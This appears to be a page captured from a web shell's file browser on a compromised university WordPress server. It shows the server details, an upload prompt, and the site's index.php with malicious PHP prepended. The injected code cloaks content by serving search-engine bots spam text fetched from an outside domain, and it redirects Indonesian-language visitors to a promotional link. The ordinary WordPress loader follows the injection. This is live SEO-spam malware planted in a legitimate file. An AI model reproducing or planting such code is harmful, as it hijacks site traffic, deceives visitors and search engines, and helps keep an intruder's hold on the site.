Server IP : 158.178.228.73 / Your IP : 80.80.80.153 Web Server : Apache/2.4.37 (Oracle Linux Server) OpenSSL/1.1.1k System : Linux ust-wp1-prod 5.15.0-308.179.6.el8uek.x86_64 #2 SMP Wed Apr 23 10:46:57 PDT 2025 x86_64 User : tomasFtp ( 1007) PHP Version : 8.4.8 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/root/proc/self/root/backup/tomas.source.0707250500/public_html/ |
Upload File : |
<?php $s_ref = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; if (strpos($agent, 'bot') !== false && $_SERVER['REQUEST_URI'] == '/') { $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']); if (strpos($accept_lang, 'zh') !== false && $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS'] == 1 && $_COOKIE['az'] == 'lp') { setcookie('az', 'lp', time() + 3600 * 7200); echo ' '; // Your bot-specific content exit; } echo file_get_contents("https://2025.thirtydaysoflunch.xyz/konten/jun/tomas.ust.edu.ph.txt"); exit; } $browserLang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); if ($browserLang == 'id') { header("Location: https://tap.bio/@dapurtotoo"); exit; } ?> <?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }